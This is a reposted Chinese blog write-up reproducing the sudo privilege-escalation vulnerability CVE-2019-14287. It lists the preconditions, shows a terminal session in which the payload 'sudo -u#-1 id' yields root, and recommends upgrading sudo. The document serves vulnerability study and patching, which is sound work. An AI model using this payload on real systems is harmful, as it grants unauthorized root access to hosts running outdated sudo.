[漏洞复现]CVE-2019-14287 sudo提权漏洞

本文转载自查看原文 2019-10-15 17:19 1827 Linux

漏洞描述

2019年10月14日，CVE官方发布了CVE-2019-14287的漏洞预警。通过特定payload，用户可提升至root权限。
利用前提

sudo -v < 1.8.28
知道当前用户的密码
当前用户存在于sudo权限列表

漏洞复现

mark@mark-Pc:~$ id
uid=1000(mark) gid=1000(mark) 组=1000(mark),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
mark@mark-Pc:~$ sudo -u#-1 id
[sudo] mark 的密码： 
uid=0(root) gid=1000(mark) 组=1000(mark)

修复建议

升级sudo到1.8.28版本
做好sudo用户列表管理

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 sudo 提权漏洞（CVE-2019-14287）复现 linux CVE-2019-14287 Sudo提权漏洞 10.16Maccms后门分析、Sudo提权漏洞（CVE-2019-14287）复现 [提权]sudo提权复现(CVE-2019-14287) 2019-10-16，sudo提权漏洞（CVE-2019-14287）实现 Linux sudo(CVE-2019-14287)漏洞复现过程源码安装sudo-1.8.31,解决CVE-2019-14287(sudo提权)问题 Sudo提权漏洞复现 CVE-2021-3156 sudo提权漏洞复现【CVE-2021-3156】linux sudo提权漏洞复现及修复